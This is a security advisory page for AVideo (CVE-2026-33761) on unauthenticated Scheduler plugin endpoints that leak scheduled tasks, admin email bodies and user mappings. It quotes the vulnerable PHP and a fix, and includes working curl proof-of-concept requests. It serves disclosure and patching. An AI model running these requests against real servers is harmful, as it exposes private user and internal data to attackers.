GHSA-J724-5C6C-68G5

Vulnerability from github – Published: 2026-03-26 18:06 – Updated: 2026-03-27 21:38
VLAI?
Summary
AVideo: Unauthenticated Access to Scheduler Plugin Endpoints Leaks Scheduled Tasks, Email Content, and User Mappings
Details

Summary

Three list.json.php endpoints in the Scheduler plugin lack any authentication check, while every other endpoint in the same plugin directories (add.json.php, delete.json.php, index.php) requires User::isAdmin(). An unauthenticated attacker can retrieve all scheduled tasks (including internal callback URLs and parameters), admin-composed email messages, and user-to-email targeting mappings by sending simple GET requests.

Details

The vulnerable files are:

1. plugin/Scheduler/View/Scheduler_commands/list.json.php:1-7

<?php
require_once '../../../../videos/configuration.php';
require_once $global['systemRootPath'] . 'plugin/Scheduler/Objects/Scheduler_commands.php';
header('Content-Type: application/json');

$rows = Scheduler_commands::getAll();
?>
{"data": <?php echo json_encode($rows); ?>}

2. plugin/Scheduler/View/Emails_messages/list.json.php:1-10

<?php
require_once '../../../../videos/configuration.php';
require_once $global['systemRootPath'] . 'plugin/Scheduler/Objects/Emails_messages.php';
header('Content-Type: application/json');

$rows = Emails_messages::getAll();
$total = Emails_messages::getTotal();
?>
{"data": <?php echo json_encode($rows); ?>, ...}

3. plugin/Scheduler/View/Email_to_user/list.json.php:1-10

<?php
require_once '../../../../videos/configuration.php';
require_once $global['systemRootPath'] . 'plugin/Scheduler/Objects/Email_to_user.php';
header('Content-Type: application/json');

$rows = Email_to_user::getAll();
$total = Email_to_user::getTotal();
?>
{"data": <?php echo json_encode($rows); ?>, ...}

None of these files check authentication before calling getAll(), which executes SELECT * FROM {table} and returns the entire table contents.

In contrast, every sibling endpoint requires admin access. For example, plugin/Scheduler/View/Scheduler_commands/add.json.php:12-15:

if(!User::isAdmin()){
    $obj->msg = "You cant do this";
    die(json_encode($obj));
}

The Scheduler_commands table (defined in plugin/Scheduler/Objects/Scheduler_commands.php) stores fields including callbackURL (internal server URLs with query parameters), parameters (JSON blobs containing user IDs and email configuration), status, timezone, and cron scheduling fields. The Emails_messages table stores subject and message (full HTML email bodies composed by admins). The Email_to_user table maps users_id to emails_messages_id, revealing which users are targeted by which email campaigns.

PoC

# 1. Retrieve all scheduled tasks — exposes internal callbackURLs and parameters
curl -s 'https://target/plugin/Scheduler/View/Scheduler_commands/list.json.php' | jq '.data[] | {id, callbackURL, parameters, status, type}'

# 2. Retrieve all admin-composed email messages — exposes subject and HTML body
curl -s 'https://target/plugin/Scheduler/View/Emails_messages/list.json.php' | jq '.data[] | {id, subject, message}'

# 3. Retrieve user-to-email targeting mappings — reveals which users receive which emails
curl -s 'https://target/plugin/Scheduler/View/Email_to_user/list.json.php' | jq '.data[] | {users_id, emails_messages_id, sent_at}'

All three return full database contents with no authentication required. No session cookie or token is needed.

Impact

An unauthenticated attacker can:

  • Enumerate internal infrastructure: callbackURL fields expose internal server URLs and query parameters used by the scheduler, potentially revealing internal API endpoints and their parameter structures
  • Read admin email campaigns: Full email subjects and HTML message bodies composed by administrators are exposed
  • Map user targeting: The Email_to_user table reveals which users_id values are targeted by which email campaigns, enabling user enumeration and profiling
  • Gather reconnaissance: Scheduling configuration (cron fields, execution status, timezone) reveals operational patterns and timing of automated tasks

The information disclosed could be used to facilitate further attacks (e.g., using discovered internal URLs for SSRF, or user IDs for targeted account attacks).

Recommended Fix

Add User::isAdmin() checks to all three list.json.php files, matching the pattern used by sibling endpoints. For each file, add the following after the require_once lines and before the data retrieval:

plugin/Scheduler/View/Scheduler_commands/list.json.php:

<?php
require_once '../../../../videos/configuration.php';
require_once $global['systemRootPath'] . 'plugin/Scheduler/Objects/Scheduler_commands.php';
header('Content-Type: application/json');

if(!User::isAdmin()){
    die(json_encode(['error' => true, 'msg' => 'Not authorized']));
}

$rows = Scheduler_commands::getAll();
?>
{"data": <?php echo json_encode($rows); ?>}

Apply the same pattern to Emails_messages/list.json.php and Email_to_user/list.json.php.

Severity ?
5.3 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33761"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-26T18:06:39Z",
    "nvd_published_at": "2026-03-27T15:16:58Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThree `list.json.php` endpoints in the Scheduler plugin lack any authentication check, while every other endpoint in the same plugin directories (`add.json.php`, `delete.json.php`, `index.php`) requires `User::isAdmin()`. An unauthenticated attacker can retrieve all scheduled tasks (including internal callback URLs and parameters), admin-composed email messages, and user-to-email targeting mappings by sending simple GET requests.\n\n## Details\n\nThe vulnerable files are:\n\n**1. `plugin/Scheduler/View/Scheduler_commands/list.json.php:1-7`**\n```php\n\u003c?php\nrequire_once \u0027../../../../videos/configuration.php\u0027;\nrequire_once $global[\u0027systemRootPath\u0027] . \u0027plugin/Scheduler/Objects/Scheduler_commands.php\u0027;\nheader(\u0027Content-Type: application/json\u0027);\n\n$rows = Scheduler_commands::getAll();\n?\u003e\n{\"data\": \u003c?php echo json_encode($rows); ?\u003e}\n```\n\n**2. `plugin/Scheduler/View/Emails_messages/list.json.php:1-10`**\n```php\n\u003c?php\nrequire_once \u0027../../../../videos/configuration.php\u0027;\nrequire_once $global[\u0027systemRootPath\u0027] . \u0027plugin/Scheduler/Objects/Emails_messages.php\u0027;\nheader(\u0027Content-Type: application/json\u0027);\n\n$rows = Emails_messages::getAll();\n$total = Emails_messages::getTotal();\n?\u003e\n{\"data\": \u003c?php echo json_encode($rows); ?\u003e, ...}\n```\n\n**3. `plugin/Scheduler/View/Email_to_user/list.json.php:1-10`**\n```php\n\u003c?php\nrequire_once \u0027../../../../videos/configuration.php\u0027;\nrequire_once $global[\u0027systemRootPath\u0027] . \u0027plugin/Scheduler/Objects/Email_to_user.php\u0027;\nheader(\u0027Content-Type: application/json\u0027);\n\n$rows = Email_to_user::getAll();\n$total = Email_to_user::getTotal();\n?\u003e\n{\"data\": \u003c?php echo json_encode($rows); ?\u003e, ...}\n```\n\nNone of these files check authentication before calling `getAll()`, which executes `SELECT * FROM {table}` and returns the entire table contents.\n\nIn contrast, every sibling endpoint requires admin access. For example, `plugin/Scheduler/View/Scheduler_commands/add.json.php:12-15`:\n```php\nif(!User::isAdmin()){\n    $obj-\u003emsg = \"You cant do this\";\n    die(json_encode($obj));\n}\n```\n\nThe `Scheduler_commands` table (defined in `plugin/Scheduler/Objects/Scheduler_commands.php`) stores fields including `callbackURL` (internal server URLs with query parameters), `parameters` (JSON blobs containing user IDs and email configuration), `status`, `timezone`, and cron scheduling fields. The `Emails_messages` table stores `subject` and `message` (full HTML email bodies composed by admins). The `Email_to_user` table maps `users_id` to `emails_messages_id`, revealing which users are targeted by which email campaigns.\n\n## PoC\n\n```bash\n# 1. Retrieve all scheduled tasks \u2014 exposes internal callbackURLs and parameters\ncurl -s \u0027https://target/plugin/Scheduler/View/Scheduler_commands/list.json.php\u0027 | jq \u0027.data[] | {id, callbackURL, parameters, status, type}\u0027\n\n# 2. Retrieve all admin-composed email messages \u2014 exposes subject and HTML body\ncurl -s \u0027https://target/plugin/Scheduler/View/Emails_messages/list.json.php\u0027 | jq \u0027.data[] | {id, subject, message}\u0027\n\n# 3. Retrieve user-to-email targeting mappings \u2014 reveals which users receive which emails\ncurl -s \u0027https://target/plugin/Scheduler/View/Email_to_user/list.json.php\u0027 | jq \u0027.data[] | {users_id, emails_messages_id, sent_at}\u0027\n```\n\nAll three return full database contents with no authentication required. No session cookie or token is needed.\n\n## Impact\n\nAn unauthenticated attacker can:\n\n- **Enumerate internal infrastructure**: `callbackURL` fields expose internal server URLs and query parameters used by the scheduler, potentially revealing internal API endpoints and their parameter structures\n- **Read admin email campaigns**: Full email subjects and HTML message bodies composed by administrators are exposed\n- **Map user targeting**: The `Email_to_user` table reveals which `users_id` values are targeted by which email campaigns, enabling user enumeration and profiling\n- **Gather reconnaissance**: Scheduling configuration (cron fields, execution status, timezone) reveals operational patterns and timing of automated tasks\n\nThe information disclosed could be used to facilitate further attacks (e.g., using discovered internal URLs for SSRF, or user IDs for targeted account attacks).\n\n## Recommended Fix\n\nAdd `User::isAdmin()` checks to all three `list.json.php` files, matching the pattern used by sibling endpoints. For each file, add the following after the `require_once` lines and before the data retrieval:\n\n**`plugin/Scheduler/View/Scheduler_commands/list.json.php`:**\n```php\n\u003c?php\nrequire_once \u0027../../../../videos/configuration.php\u0027;\nrequire_once $global[\u0027systemRootPath\u0027] . \u0027plugin/Scheduler/Objects/Scheduler_commands.php\u0027;\nheader(\u0027Content-Type: application/json\u0027);\n\nif(!User::isAdmin()){\n    die(json_encode([\u0027error\u0027 =\u003e true, \u0027msg\u0027 =\u003e \u0027Not authorized\u0027]));\n}\n\n$rows = Scheduler_commands::getAll();\n?\u003e\n{\"data\": \u003c?php echo json_encode($rows); ?\u003e}\n```\n\nApply the same pattern to `Emails_messages/list.json.php` and `Email_to_user/list.json.php`.",
  "id": "GHSA-j724-5c6c-68g5",
  "modified": "2026-03-27T21:38:00Z",
  "published": "2026-03-26T18:06:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-j724-5c6c-68g5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33761"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/83390ab1fa8dca2de3f8fa76116a126428405431"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo: Unauthenticated Access to Scheduler Plugin Endpoints Leaks Scheduled Tasks, Email Content, and User Mappings"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.